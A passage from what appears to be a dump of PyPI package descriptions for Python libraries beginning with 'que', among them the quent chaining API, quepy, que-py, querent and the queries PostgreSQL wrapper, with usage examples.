arguments)Chain(fn).then(False)Chain(42).then(verify_result)Chain('').then(uuid.UUID)root(value: Any = None, *args, **kwargs) -> ChainLike.then(), but it first sets the root value as the current value, and then it evaluatesvalueby the defaultevaluation procedure.Calling.root()without a value simply returns the root value.Read more inFlow Modifiers.Chain(42).then(lambdav:v/10).root(lambdav:v==42)ignore(value: Any, *args, **kwargs) -> ChainLike.then(), but keeps the current value unchanged.In other words, this function does not affect the flow of the chain.Read more inFlow Modifiers.Chain(fetch_data,id).ignore(print).then(validate_data)root_ignore(value: Any, *args, **kwargs) -> ChainThe combination of.root()and.ignore().Chain(fetch_data,id).then(validate_data).root_ignore(print).then(normalize_data)attr(name: str) -> ChainLike.then(), but evaluates togetattr(current_value, name).classA:@propertydefa1(self):# I return something importantpassChain(A()).attr('a1')ChainAttr(A()).a1attr_fn(name: str, *args, **kwargs) -> ChainLike.attr(), but evaluates togetattr(current_value, name)(*args, **kwargs).classA:defa1(self,foo=None):# I do something importantpassChain(A()).attr_fn('a1',foo=1)ChainAttr(A()).a1(2)Foreachforeach(fn: Callable) -> ChainIterates over the current value and invokesfn(element)for each element. Returns a list\nthat is the result offn(element)for eachelement.If the iterator implements__aiter__,async for ...will be used.Example:Chain(list_of_ids).foreach(validate_id).run()will iterate overlist_of_ids, and return a list that is equivalent to[validate_id(id) for id in list_of_ids].foreach_do(fn: Callable) -> ChainLike.foreach(), but returns nothing. In other words, this is the combination of.foreach()and.ignore().Example:Chain(list_of_ids).foreach_do(Chain().then(fetch_data).then(validate_data).then(normalize_data).then(send_data)).run()will iterate overlist_of_ids, invoke the nested chain with each differentid, and then returnlist_of_ids.Withwith_(self, value: Any | Callable = None, *args, **kwargs) -> ChainExecuteswith current_value as ctxand evaluatesvalueinside the context block,withctxas the current value, and returns the result. Ifvalueis not provided, returnsctx.\nThis method follows thedefault evaluationprocedure, so passingargsorkwargsis perfectly valid.Depending onvalue(andargs/kwargs), this is roughly equivalent towithcurrent_valueasctx:returnvalue(ctx)If the context object implements__aenter__,async with ...will be used.Example:Chain(get_lock,id).with_(fetch_data,id).run()is roughly equivalent to:withget_lock(id)aslock:# `lock` is not used here since we passed a custom argument `id`.returnfetch_data(id)with_do(self, value: Any | Callable, *args, **kwargs) -> ChainLike.with_(), but returns nothing. In other words, this is the combination of.with_()and.ignore().Class MethodsChain.from_(*args) -> ChainCreates aChaintemplate, and registersargsas chain items.Chain.from_(validate_data,normalize_data,send_data).run(fetch_data,id)# is the same as doingChain().then(validate_data).then(normalize_data).then(send_data).run(fetch_data,id)Callbacksexcept_(fn: Callable | str, *args, **kwargs) -> ChainRegister a callback that will be called if an exception is raised anytime during the chain's\nevaluation. The callback is evaluated with the root value, or withargsandkwargsif provided.Iffnis a string, then it is assumed to be an attribute method of the root value.Chain(fetch_data).then(validate_data).except_(discard_data)finally_(fn: Callable | str, *args, **kwargs) -> ChainRegister a callback that willalwaysbe called after the chain's evaluation. The callback is evaluated with\nthe root value, or withargsandkwargsif provided.Iffnis a string, then it is assumed to be an attribute method of the root value.Chain(get_id).then(aqcuire_lock).root(fetch_data).finally_(release_lock)Conditionalsif_(on_true: Any | Callable, *args, **kwargs) -> ChainEvaluates the truthiness of the current value (bool(current_value)).\nIfon_trueis provided and the result isTrue, evaluateson_trueand returns the result.\nIfon_trueis not provided, simply returns the truthiness result (bool).on_truemay be anything and follows the defaultevaluation procedureas described above.Chain(get_random_number).then(lambdan:n>5).if_(you_win,prize=1)else_(on_false: Any | Callable, *args, **kwargs) -> ChainIf a previous conditional result is falsy, evaluateson_falseand returns the result.on_falsemay be anything and follows the defaultevaluation procedureas described above.Can only be called immediately following a conditional.Chain(get_random_number).then(lambdan:n>5).if_(you_win,prize=1).else_(you_lose,cost=10)not_() -> Chainnot current_valueThis method currently does not support theon_trueargument since it looks confusing.\nI might add it in the future.Chain(is_valid,'something').not_()eq(value: Any, on_true: Any | Callable = None, *args, **kwargs) -> Chaincurrent_value == valueChain(420).then(lambdav:v/10).eq(42)Chain(420).then(lambdav:v/10).eq(40).else_(on_fail)neq(value: Any, on_true: Any | Callable = None, *args, **kwargs) -> Chaincurrent_value != valueChain(420).then(lambdav:v/10).neq(40)is_(value: Any, on_true: Any | Callable = None, *args, **kwargs) -> Chaincurrent_value is valueChain(object()).is_(1)is_not(value: Any, on_true: Any | Callable = None, *args, **kwargs) -> Chaincurrent_value is not valueChain(object()).is_not(object())in_(value: Any, on_true: Any | Callable = None, *args, **kwargs) -> Chaincurrent_value in valueChain('sub').in_('subway')not_in(value: Any, on_true: Any | Callable = None, *args, **kwargs) -> Chaincurrent_value not in valueChain('bus').then(lambdas:s[::-1]).not_in('subway')CascadeAlthough considered unpythonic, in some cases thecascade designcan be very helpful. TheCascadeclass is identical toChain, except that during the chain's evaluation,\neach chain item is evaluated using the root value as an argument\n(or in other words, the current value is always the chain's root value).\nThe return value ofCascade.run()is always its root value.fromquentimportCascadefetched_data=(Cascade(fetch_data,id).then(send_data_to_backup).then(lambdadata:send_data(data,to_id=1)).then(print).run())will executefetch_data(id), thensend_data_to_backup(data), thensend_data(data, to_id=1),\nand thenprint(data).You can also useCascadeto make existing classes behave the same way:fromquentimportCascadeAttrclassFoo:deffoo(self):...asyncdefbar(self):...defbaz(self):...asyncdefget_foo():f=Foo()f.foo()awaitf.bar()f.baz()returnfdefbetter_get_foo():returnCascadeAttr(Foo()).foo().bar().baz().run()Cascadeworks for any kind of object:fromquentimportCascadeAttrCascadeAttr([]).append(1).append(2).append(3).run()==[1,2,3]Cascade - Void ModeIn some cases it may be desired to run a bunch of independent operations. UsingCascade, one can\nachieve this by simply not passing a root value to the constructor nor to.run(). All the chain items\nwill not receive any arguments (excluding explicitly providedargs/kwargs).await(Cascade().then(foo,False).then(bar).then(baz).run())will executefoo(False), thenbar(), thenbaz().A voidCascadewill always returnNone.Direct Attribute AccessBothChainandCascadecan support \"direct\" attribute access via theChainAttrandCascadeAttrclasses.\nSee theCascadesection above to see an example ofCascadeAttrusage. The same principle holds forChainAttr. Accessing attributes without using theAttrsubclass is possible using.attr()and.attr_fn().The reason I decided to separate this functionality from the main classes is due to the fact\nthat it requires overriding__getattr__, which drastically increases the overhead of both creating an instance and\naccessing any properties / methods. And since I don't think this kind of usage will be common, I decided\nto keep this functionality opt-in.Important NotesAsynchronousexceptandfinallycallbacksIf an except/finally callback is a coroutine function, and an exception is raisedbeforethe first coroutine of the chain has been evaluated, or if there aren't any coroutines in the chain - each\ncallback will be invoked inside a new Task, which you won't have access to.\nThis is due to the fact that we cannot return the new Task(s) from theexcept/finallyclauses.This shouldn't be an issue in most use cases, but important to be aware of.\nARuntimeWarningwill be emitted in such a case.As an example, suppose thatfetch_datais synchronous, andreport_usageis asynchronous.Chain(fetch_data).then(raise_exception,...).finally_(report_usage).run()will executefetch_data(), thenraise_exception(), and thenreport_usage(data). Butreport_usage(data)is a\ncoroutine, andfetch_dataandraise_exceptionsare not. Then Quent will wrapreport_usage(data)in a Task\nand \"forget\" about it.If you must, you can \"force\" an async chain by giving it a dummy coroutine:asyncdeffn(v):returnvawaitChain(fetch_data).then(fn).then(raise_exception,...).finally_(report_usage).run()This will ensure thatreport_usage()will be awaited properly."} +{"package": "quente", "pacakge-description": "No description available on PyPI."} +{"package": "quentinrosinski-picsou", "pacakge-description": "No description available on PyPI."} +{"package": "quepland-bot", "pacakge-description": "A simple library for recording and playing mouse macros at regular intervals between clicks.CompatibilityBuilt and tested on Ubuntu 21.04.Installationpip install quepland_botUsageImport and instantiate QueplandBotfrom quepland_bot import QueplandBot\n\n\nbot = QueplandBot()Record clicks: once the method is called, it will wait for a space bar press to begin recording.\nPress any kay to stop recording.bot.record_clicks()Play what you recorded until any key is pressed:bot.run()Changing intervals between clicksWhen instantiating QueplandBot you can define how many seconds it will take between clicks when playing a sequence.\nDefault is 0.1 seconds.bot = Queplandbot(default_seconds_between_clicks=0.5)Saving routinesYou can save a sequence of clicks by assigning the return ofrecord_clicks()to a variable.\nTo play it, pass it as an argument torun().\nWhenrun()is called without arguments it runs last routine recorded.bot = QueplandBot()\n\none_routine = bot.record_clicks()\nother_routine = bot.record_clicks()\n\nbot.run(one_routine)"} +{"package": "quepy", "pacakge-description": "__ _ _ _ ___ _ __ _ _\n / _` | | | |/ _ \\ '_ \\| | | |\n| (_| | |_| | __/ |_) | |_| |\n \\__, |\\__,_|\\___| .__/ \\__, |\n |_| |_| |___/What\u2019s quepy?Quepy is a python framework to transform natural language questions to queries\nin a database query language. It can be easily customized to different kinds of\nquestions in natural language and database queries. So, with little coding you\ncan build your own system for natural language access to your database.CurrentlyQuepyprovides support forSparqlandMQLquery languages.\nWe plan to extended it to other database query languages.An exampleTo illustrate what can you do with quepy, we included an example application to\naccessDBpediacontents via theirsparqlendpoint.You can try the example online here:Online demoOr, you can try the example yourself by doing:python examples/dbpedia/main.py \"Who is Tom Cruise?\"And it will output something like this:SELECTDISTINCT?x1WHERE{?x0rdf:typefoaf:Person.?x0rdfs:label\"Tom Cruise\"@en.?x0rdfs:comment?x1.}ThomasCruiseMapotherIV,widelyknownasTomCruise,isan...The transformation from natural language to sparql is done by first using a\nspecial form of regular expressions:person_name=Group(Plus(Pos(\"NNP\")),\"person_name\")regex=Lemma(\"who\")+Lemma(\"be\")+person_name+Question(Pos(\".\"))And then using and a convenient way to express semantic relations:person=IsPerson()+HasKeyword(person_name)definition=DefinitionOf(person)The rest of the transformation is handled automatically by the framework to\nfinally produce this sparql:SELECTDISTINCT?x1WHERE{?x0rdf:typefoaf:Person.?x0rdfs:label\"Tom Cruise\"@en.?x0rdfs:comment?x1.}Using a very similar procedure you could generate and MQL query for the same question\nobtaining:[{\"/common/topic/description\":[{}],\"/type/object/name\":\"Tom Cruise\",\"/type/object/type\":\"/people/person\"}]InstallationYou need to have installednumpy.\nOther than that, you can just type:pip install quepyYou can get more details on the installation here:http://quepy.readthedocs.org/en/latest/installation.htmlLearn moreYou can find a tutorial here:http://quepy.readthedocs.org/en/latest/tutorial.htmlAnd the full documentation here:http://quepy.readthedocs.org/Join ourmailing listContribute!Want to help develop quepy? Welcome aboard! Find us in#quepy at freenodequepydev at librelist.com"} +{"package": "que-py", "pacakge-description": "Que: SQL for Sneks \ud83d\udc0dQue allows you to get generate your SQL queries on the fly, without the\noverhead of a fully-fledged ORM.MotivationsQue was born out of a need for dynamically generated SQL for an ASGI web\nservice. I found my self wishing for the convenience of dynamic querying\nwith an ORM such as SQLAlchemy, but the performance of a fully\nasynchronous database client. Que attempts to fill this void. Choose the\nconnection client you prefer and let Que worry about the SQL.What Is It?Que looks to solve a single purpose: generate SQL-compliant queries in\npure-Python. Que has absolutely no hard dependendencies and does not\nenforce the use of a specific database client or dialect.Still want to use SQLAlchemy for your connection? Go for it. Want to use\nPyMySQL or psycopg2? Que won't stop you. Want to use an asyncio\nframework such as aiopg? You have excellent taste! This library was\nwritten just for you.DesignThe focus of Que issimplicity, just look at what it takes for a\nsimpleSELECT:>>>importque>>>select=que.Select(table='foo')>>>selectSelect(table='foo',schema=None,filters=FilterList([]),fields=FieldList([]))>>>sql,args=select.to_sql()>>>print(sql)SELECT*FROMfooQue works with the DBAPI client of your choice by parametrizing your sql\nand formatting your arguments for you:>>>importque>>>fields=[que.Field('bar')]>>>filters=[que.Filter(que.Field('id',1))]>>>select=que.Select(table='foo',filters=filters,fields=fields)>>>sql,args=select.to_sql()>>>print(sql)SELECTbarFROMfooWHEREid=:1>>>args[1]>>>sql,args=select.to_sql(style=que.NameParamStyle.NAME)>>>print(sql)SELECTbarFROMfooWHEREid=:id>>>args{'id':1}Que works to normalize the API for your SQL operations, so that\ninitializing anINSERTorUPDATEis functionally the same as\ninitializing aSELECT:>>>importque>>>importdataclasses>>>importdatetime>>>>>>@dataclasses.dataclass...classFoo:...bar:str...id:int=None...created:datetime.datetime=None...>>>new_foo=Foo('blah')>>>fields=que.data_to_fields(new_foo,exclude=None)>>>insert=que.Insert(table='foo',fields=fields)>>>sql,args=insert.to_sql(que.NameParamStyle.NAME)>>>print(sql)INSERTINTOfoo(:colbar)VALUES(:valbar)>>>args{'colbar':'bar','valbar':'blah'}QuickStartQue has no dependencies and is exceptionally light-weight (currently\nonly ~30Kb!), comprising of only a few hundred lines of code.\nInstallation is as simple aspip3 install que-py.Then you're good to go!import queand rock on \ud83e\udd18ExamplesA simple client for generating your SQL and inserting new entries:importdataclassesimportsqlite3importque@dataclasses.dataclassclassSpam:flavor:strid:int=Nonecreated_on:int=NoneclassSpamClient:\"\"\"A database client for tracking spam flavors.\"\"\"def__init__(self):self.conn=sqlite3.connect('sqlite://spam.db')definsert_spam(self,spam:Spam):fields=que.data_to_fields(spam,exclude=None)insert=que.Insert('spam',fields=fields)sql,args=insert.to_sql()returnself.conn.execute(sql,args)defget_spam(self,**kwargs):fields=que.data_to_fields(kwargs)filters=[que.Filter(x)forxinfields]select=que.Select('spam',filters=filters)returnself.conn.execute(*select.to_sql())defupdate_spam(self,spam:Spam):fields=[que.Field('flavor',spam.flavor)]filters=[que.Filter(que.Field('id',spam.id))]update=que.Update('spam',filters=filters,fields=fields)returnself.conn.execute(*update.to_sql())defdelete_spam(self,spam:Spam):filters=[que.Filter(que.Field('id',spam.id))]delete=que.Delete('spam',filters=filters)returnself.conn.execute(*delete.to_sql())DocumentationFull documentation coming soon!Happy Querying \ud83d\udc0dHow to ContributeCheck for open issues or open a fresh issue to start a discussion\naround a feature idea or a bug.Create a branch on Github for your issue or forkthe repositoryon GitHub to\nstart making your changes to themasterbranch.Write a test which shows that the bug was fixed or that the feature\nworks as expected.Send a pull request and bug the maintainer until it gets merged and\npublished. :)"} +{"package": "quera", "pacakge-description": "No description available on PyPI."} +{"package": "quera-ahs-utils", "pacakge-description": "quera-ahs-utilsThis python package is a collection of tools that can be used to program QuEra'sneutral atom Analog Hamiltonian Simulator(ahs). These tools are primarily targeted towards the usage ofAmazon's Braket quantum computing service. The Braket Python SDK can be foundherealong with some examples of how to use their service through a collection of examples from bothBraketandQuEra.Some of the source code contained in this package originates fromthismodule which was co-authered by the Braket science team.We would be remiss not to advertise our ownJuliaSDK for programming QuEra'sahs,Bloqadeas well as modeling neutral atom quantum computing.InstallationThe package can be installed viapip:pip install quera-ahs-utilsPackage contentsquera-ahs-utilsis broken up into 5 modules each dealing with specific tools summarized in the table below:moduledescriptionquera_ahs_utils.analysisPerform analysis on shot resultsquera_ahs_utils.driveEasily generate different types of driving hamiltoniansquera_ahs_utils.irTransform between QuEra and Braket program representationsquera_ahs_utils.parallelizeTransform small jobs into a parallel set of jobs to maximize the field of view of the QPUquera_ahs_utils.plottingVisualize bothahsprograms as well as its results.A module reference can be foundhere"} +{"package": "querent", "pacakge-description": "QuerentThe Asynchronous Data Dynamo and Graph Neural Network CatalystUnlock Insights, Asynchronous Scaling, and Forge a Knowledge-Driven Future\ud83d\ude80Async at its Core: Querent thrives in an asynchronous world. With asynchronous processing, we handle multiple data sources seamlessly, eliminating bottlenecks for utmost efficiency.\ud83d\udca1Knowledge Graphs Made Easy: Constructing intricate knowledge graphs is a breeze. Querent's robust architecture simplifies building comprehensive knowledge graphs, enabling you to uncover hidden data relationships.\ud83c\udf10Scalability Redefined: Scaling your data operations is effortless with Querent. We scale horizontally, empowering you to process multiple data streams without breaking a sweat.\ud83d\udd2cGNN Integration: Querent seamlessly integrates with Graph Neural Networks (GNNs), enabling advanced data analysis, recommendation systems, and predictive modeling.\ud83d\udd0dData-Driven Insights: Dive deep into data-driven insights with Querent's tools. Extract actionable information and make data-informed decisions with ease.\ud83e\udde0Leverage Language Models: Utilize state-of-the-art language models (LLMs) for text data. Querent empowers natural language processing, tackling complex text-based tasks.\ud83d\udcc8Efficient Memory Usage: Querent is mindful of memory constraints. Our framework uses memory-efficient techniques, ensuring you can handle large datasets economically.Table of ContentsQuerentUnlock Insights, Asynchronous Scaling, and Forge a Knowledge-Driven FutureTable of ContentsIntroductionFeaturesGetting StartedPrerequisitesInstallationUsageConfigurationQuerent: an asynchronous engine for LLMsEase of UseContributingLicenseIntroductionQuerent is designed to simplify and optimize data collection and processing workflows. Whether you need to scrape web data, ingest files, preprocess text, or create complex knowledge graphs, Querent offers a flexible framework for building and scaling these processes.FeaturesCollectors:Gather data from various sources asynchronously, including web scraping and file collection.Ingestors:Process collected data efficiently with custom transformations and filtering.Processors:Apply asynchronous data processing, including text preprocessing, cleaning, and feature extraction.Storage:Store processed data in various storage systems, such as databases or cloud storage.Workflow Management:Efficiently manage and scale data workflows with task orchestration.Scalability:Querent is designed to scale horizontally, handling large volumes of data with ease.Getting StartedLet's get Querent up and running on your local machine.PrerequisitesPython 3.9+Virtual environment (optional but recommended)InstallationCreate a virtual environment (recommended):python-mvenvvenvsourcevenv/bin/activate# On Windows, use `venv\\Scripts\\activate`Install latest Querent Workflow Orchestrator package:pipinstallquerentInstall the project dependencies:python3-mspacydownloaden_core_web_lgUsageQuerent provides a flexible framework that adapts to your specific data collection and processing needs. Here's how to get started:Configuration:Set up collector, ingestor, and processor configurations as needed.Collecting Data:Implement collector classes to gather data from chosen sources. Handle errors and edge cases gracefully.Processing Data:Create ingestors and processors to clean, transform, and filter collected data. Apply custom logic to meet your requirements.Storage:Choose your storage system (e.g., databases) and configure connections. Store processed data efficiently.Task Orchestration:For large tasks, implement a task orchestrator to manage and distribute the workload.Scaling:To handle scalability, consider running multiple instances of collectors and ingestors in parallel.Monitoring:Implement monitoring and logging to track task progress, detect errors, and ensure smooth operation.Documentation:Maintain thorough project documentation to make it easy for others (and yourself) to understand and contribute.ConfigurationQuerent relies on configuration files to define how collectors, ingestors, and processors operate. These files are typically located in theconfigdirectory. Ensure that you configure the components according to your project's requirements.Querent: an asynchronous engine for LLMsSequence Diagram:Asynchronous Data Processing in QuerentsequenceDiagram\n participant User\n participant Collector\n participant Ingestor\n participant Processor\n participant LLM\n participant Querent\n participant Storage\n participant Callback\n\n User->>Collector: Initiate Data Collection\n Collector->>Ingestor: Collect Data\n Ingestor->>Processor: Ingest Data\n Processor->>LLM: Process Data (IngestedTokens)\n LLM->>Processor: Processed Data (EventState)\n Processor->>Storage: Store Processed Data (CollectedBytes)\n Ingestor->>Querent: Send Ingested Data (IngestedTokens)\n Querent->>Processor: Process Ingested Data (IngestedTokens)\n Processor->>LLM: Process Data (IngestedTokens)\n LLM->>Processor: Processed Data (EventState)\n Callback->>Storage: Store Processed Data (EventState)\n Querent->>Processor: Processed Data Available (EventState)\n Processor->>Callback: Return Processed Data (EventState)\n Callback->>User: Deliver Processed Data (CollectedBytes)\n\n Note right of User: Asynchronous Flow\n Note right of Collector: Data Collection\n Note right of Ingestor: Data Ingestion\n Note right of Processor: Data Processing\n Note right of LLM: Language Model Processing\n Note right of Querent: Query Execution\n Note right of Storage: Data Storage\n Note right of Callback: Callback InvocationEase of UseWith Querent, creating scalable workflows with any LLM is just a few lines of code.importpytestimportuuidfrompathlibimportPathimportasynciofromquerent.callback.event_callback_interfaceimportEventCallbackInterfacefromquerent.common.types.ingested_tokensimportIngestedTokensfromquerent.common.types.ingested_codeimportIngestedCodefromquerent.common.types.ingested_imagesimportIngestedImagesfromquerent.common.types.ingested_messagesimportIngestedMessagesfromquerent.common.types.querent_eventimportEventState,EventTypefromquerent.common.types.querent_queueimportQuerentQueuefromquerent.core.base_engineimportBaseEnginefromquerent.querent.querentimportQuerentfromquerent.querent.resource_managerimportResourceManagerfromquerent.collectors.collector_resolverimportCollectorResolverfromquerent.common.uriimportUrifromquerent.config.collector.collector_configimportFSCollectorConfigfromquerent.ingestors.ingestor_managerimportIngestorFactoryManager# Create input and output queuesinput_queue=QuerentQueue()resource_manager=ResourceManager()# Define a simple mock LLM engine for testingclassMockLLMEngine(BaseEngine):def__init__(self,input_queue:QuerentQueue):super().__init__(input_queue)asyncdefprocess_tokens(self,data:IngestedTokens):ifdataisNoneordata.is_error():# the LLM developer can raise an error here or do something else# the developers of Querent can customize the behavior of Querent# to handle the error in a way that is appropriate for the use caseself.set_termination_event()return# Set the state of the LLM# At any given point during the execution of the LLM, the LLM developer# can set the state of the LLM using the set_state method# The state of the LLM is stored in the state attribute of the LLM# The state of the LLM is published to subscribers of the LLMcurrent_state=EventState(EventType.Graph,1.0,\"anything\",\"dummy.txt\")awaitself.set_state(new_state=current_state)asyncdefprocess_code(self,data:IngestedCode):passasyncdefprocess_messages(self,data:IngestedMessages):returnsuper().process_messages(data)asyncdefprocess_images(self,data:IngestedImages):returnsuper().process_images(data)defvalidate(self):returnTrue@pytest.mark.asyncioasyncdeftest_example_workflow_with_querent():# Initialize some collectors to collect the datadirectory_path=\"./tests/data/pdf4\"collectors=[CollectorResolver().resolve(Uri(\"file://\"+str(Path(directory_path).resolve())),FSCollectorConfig(root_path=directory_path,id=str(uuid.uuid4())),)]# Connect to the collectorforcollectorincollectors:awaitcollector.connect()# Set up the result queueresult_queue=asyncio.Queue()# Create the IngestorFactoryManageringestor_factory_manager=IngestorFactoryManager(collectors=collectors,result_queue=result_queue)# Start the ingest_all_async in a separate taskingest_task=asyncio.create_task(ingestor_factory_manager.ingest_all_async())### A Typical Use Case #### Create an engine to harness the LLMllm_mocker=MockLLMEngine(input_queue)# Define a callback function to subscribe to state changesclassStateChangeCallback(EventCallbackInterface):asyncdefhandle_event(self,event_type:EventType,event_state:EventState):print(f\"New state:{event_state}\")print(f\"New state type:{event_type}\")assertevent_state.event_type==EventType.Graph# Subscribe to state change events# This pattern is ideal as we can expose multiple events for each use case of the LLMllm_mocker.subscribe(EventType.Graph,StateChangeCallback())## one can also subscribe to other events, e.g. EventType.CHAT_COMPLETION ...# Create a Querent instance with a single MockLLM# here we see the simplicity of the Querent# massive complexity is hidden in the Querent,# while being highly configurable, extensible, and scalable# async architecture helps to scale to multiple querenters# How async architecture works:# 1. Querent starts a worker task for each querenter# 2. Querenter starts a worker task for each worker# 3. Each worker task runs in a loop, waiting for input data# 4. When input data is received, the worker task processes the data# 5. The worker task notifies subscribers of state changes# 6. The worker task repeats steps 3-5 until terminationquerent=Querent([llm_mocker],resource_manager=resource_manager,)# Start the querentquerent_task=asyncio.create_task(querent.start())awaitasyncio.gather(ingest_task,querent_task)if__name__==\"__main__\":asyncio.run(test_example_workflow_with_querent())ContributingContributions to Querent are welcome! Please follow ourcontribution guidelinesto get started.LicenseThis project is licensed under the BSL-1.1 License - see theLICENSEfile for details."} +{"package": "queri", "pacakge-description": "No description available on PyPI."} +{"package": "querido-diario-api-wrapper", "pacakge-description": "No description available on PyPI."} +{"package": "querido-diario-toolbox", "pacakge-description": "Portugu\u00eas (BR)|English (US)ToolboxDentro doecossistema do Querido Di\u00e1rio, este reposit\u00f3rio disponibiliza umabibliotecacom o ferramental para que a comunidade possa fazer suas pr\u00f3prias an\u00e1lises e manipula\u00e7\u00f5es com os recursos do projeto.A biblioteca oferece diferentes n\u00edveis de abstra\u00e7\u00f5es para trabalhar os dados, desde uma simples limpeza de texto at\u00e9 convers\u00e3o de diferentes formatos de arquivo para texto puro.Conhe\u00e7a mais sobre astecnologiase ahist\u00f3riado projeto nosite do Querido Di\u00e1rioSum\u00e1rioComo contribuirComo executarExemplos de usoSuporteAgradecimentosOpen Knowledge BrasilLicen\u00e7aComo contribuirAgradecemos por considerar contribuir com o Querido Di\u00e1rio! :tada:Voc\u00ea encontra como faz\u00ea-lo noCONTRIBUTING.md!Al\u00e9m disso, consulte adocumenta\u00e7\u00e3o do Querido Di\u00e1riopara te ajudar.Como executarPara utilizar aquerido-diario-toolbox\u00e9 necess\u00e1rio terPython(3.8+) instalado, al\u00e9m deTesseract OCR, os.jardeApache Tika(v1.24.1+) eTabula(v1.0.4+).Para instalar a bibliotecaquerido-diario-toolboxbasta abrir um terminal e executar o seguinte comando:$pipinstallquerido-diario-toolboxPara usar, importe a biblioteca em seu c\u00f3digo em Python.Exemplos de usoExemplos mais elaborados est\u00e3o dispon\u00edveis na pasta./examples. Voc\u00ea pode visualiz\u00e1-los (e interagir se desejar) utilizando notebooksJupyter.Removendo espa\u00e7os desnecess\u00e1rios em um textoIn[1]:fromquerido_diario_toolbox.process.text_processimportremove_breaksIn[2]:texto=\"\\n\\n\\nEste texto tem v\u00e1rios espa\u00e7os em branco\\n\\n\\ndesnecess\u00e1rios.\\n\"In[3]:remove_breaks(texto)Out[3]:'Este texto tem v\u00e1rios espa\u00e7os em branco desnecess\u00e1rios.'Encontrando CNPJs v\u00e1lidos em um textoIn[1]:fromquerido_diario_toolbox.process.edition_processimportextract_and_validate_cnpjIn[2]:texto=\"As empresas de CNPJ v\u00e1lidos 00.000.000/0001-91 e 00.360.305/0001-04 existem mas a de CNPJ 12.123.123/1234.12 n\u00e3o existe...\"In[3]:extract_and_validate_cnpj(texto)Out[3]:['00.000.000/0001-91','00.360.305/0001-04']Convertendo arquivo de formato fechado para texto puro e extraindo metadadosIn[1]:fromquerido_diario_toolboximportGazette...:fromquerido_diario_toolbox.etl.text_extractorimportcreate_text_extractorIn[2]:config={\"apache_tika_jar\":\"caminho/apache/tika/jar/tika-app-1.24.1.jar\"}...:extrator=create_text_extractor(config)In[3]:diario=Gazette(filepath=\"caminho/diario/fechado/diario.pdf\")In[4]:extrator.extract_text(diario)...:extrator.extract_metadata(diario)...:extrator.load_content(diario)Ap\u00f3s a execu\u00e7\u00e3o deextrator.load_content(diario), dois arquivos (um.txtcom o texto puro e um.jsoncom os metadados) ser\u00e3o criados.Saiba mais: Informa\u00e7\u00f5es completas da bibliotecaquerido-diario-toolboxacesse suadocumenta\u00e7\u00e3oSuporteIngresse em nossocanal de comunidadepara trocas sobre os projetos, d\u00favidas, pedidos de ajuda com contribui\u00e7\u00e3o e conversar sobre inova\u00e7\u00e3o c\u00edvica em geral.AgradecimentosEste projeto \u00e9 mantido pela Open Knowledge Brasil e poss\u00edvel gra\u00e7as \u00e0s comunidades t\u00e9cnicas, \u00e0sEmbaixadoras de Inova\u00e7\u00e3o C\u00edvica, \u00e0s pessoas volunt\u00e1rias e doadoras financeiras, al\u00e9m de universidades parceiras, empresas apoiadoras e financiadoras.Conhe\u00e7aquem apoia o Querido Di\u00e1rio.Open Knowledge BrasilAOpen Knowledge Brasil\u00e9 uma organiza\u00e7\u00e3o da sociedade civil sem fins lucrativos, cuja miss\u00e3o \u00e9 utilizar e desenvolver ferramentas c\u00edvicas, projetos, an\u00e1lises de pol\u00edticas p\u00fablicas, jornalismo de dados para promover o conhecimento livre nos diversos campos da sociedade.Todo o trabalho produzido pela OKBR est\u00e1 dispon\u00edvel livremente.Licen\u00e7aC\u00f3digo licenciado sob aLicen\u00e7a MIT."} +{"package": "querier", "pacakge-description": "A query language for data frames"} +{"package": "querierdd", "pacakge-description": "No description available on PyPI."} +{"package": "queries", "pacakge-description": "Queriesis a BSD licensed opinionated wrapper of thepsycopg2library for\ninteracting with PostgreSQL.The popularpsycopg2package is a full-featured python client. Unfortunately\nas a developer, you\u2019re often repeating the same steps to get started with your\napplications that use it. Queries aims to reduce the complexity of psycopg2\nwhile adding additional features to make writing PostgreSQL client applications\nboth fast and easy. Check out theUsagesection below to see how easy it can be.Key features include:Simplified APISupport of Python 2.7+ and 3.4+PyPy support viapsycopg2cffiAsynchronous support forTornadoConnection information provided by URIQuery results delivered as a generator based iteratorsAutomatically registered data-type support for UUIDs, Unicode and Unicode ArraysAbility to directly access psycopg2connectionandcursorobjectsInternal connection poolingDocumentationDocumentation is available athttps://queries.readthedocs.orgInstallationQueries is available viapypiand can be installed with easy_install or pip:pipinstallqueriesUsageQueries provides a session based API for interacting with PostgreSQL.\nSimply pass in theURIof the PostgreSQL server to connect to when creating\na session:session=queries.Session(\"postgresql://postgres@localhost:5432/postgres\")Queries built-in connection pooling will re-use connections when possible,\nlowering the overhead of connecting and reconnecting.When specifying a URI, if you omit the username and database name to connect\nwith, Queries will use the current OS username for both. You can also omit the\nURI when connecting to connect to localhost on port 5432 as the current OS user,\nconnecting to a database named for the current user. For example, if your\nusername isfredand you omit the URI when issuingqueries.querythe URI\nthat is constructed would bepostgresql://fred@localhost:5432/fred.If you\u2019d rather use individual values for the connection, the queries.uri()\nmethod provides a quick and easy way to create a URI to pass into the various\nmethods.>>>queries.uri(\"server-name\",5432,\"dbname\",\"user\",\"pass\")'postgresql://user:pass@server-name:5432/dbname'Environment VariablesCurrently Queries uses the following environment variables for tweaking various\nconfiguration values. The supported ones are:QUERIES_MAX_POOL_SIZE- Modify the maximum size of the connection pool (default: 1)Using the queries.Session classTo execute queries or call stored procedures, you start by creating an instance of thequeries.Sessionclass. It can act as a context manager, meaning you can\nuse it with thewithkeyword and it will take care of cleaning up after itself. For\nmore information on thewithkeyword and context managers, seePEP343.In addition to both thequeries.Session.queryandqueries.Session.callprocmethods that are similar to the simple API methods, thequeries.Sessionclass\nprovides access to the psycopg2 connection and cursor objects.Using queries.Session.queryThe following example shows how aqueries.Sessionobject can be used\nas a context manager to query the database table:>>>importpprint>>>importqueries>>>>>>withqueries.Session()assession:...forrowinsession.query('SELECT * FROM names'):...pprint.pprint(row)...{'id':1,'name':u'Jacob'}{'id':2,'name':u'Mason'}{'id':3,'name':u'Ethan'}Using queries.Session.callprocThis example usesqueries.Session.callprocto execute a stored\nprocedure and then pretty-prints the single row results as a dictionary:>>>importpprint>>>importqueries>>>withqueries.Session()assession:...results=session.callproc('chr',[65])...pprint.pprint(results.as_dict())...{'chr':u'A'}Asynchronous Queries with TornadoIn addition to providing a Pythonic, synchronous client API for PostgreSQL,\nQueries provides a very similar asynchronous API for use with Tornado.\nThe only major difference API difference betweenqueries.TornadoSessionandqueries.Sessionis theTornadoSession.queryandTornadoSession.callprocmethods return the entire result set instead of acting as an iterator over\nthe results. The following example usesTornadoSession.queryin an asynchronousTornadoweb application to send a JSON payload 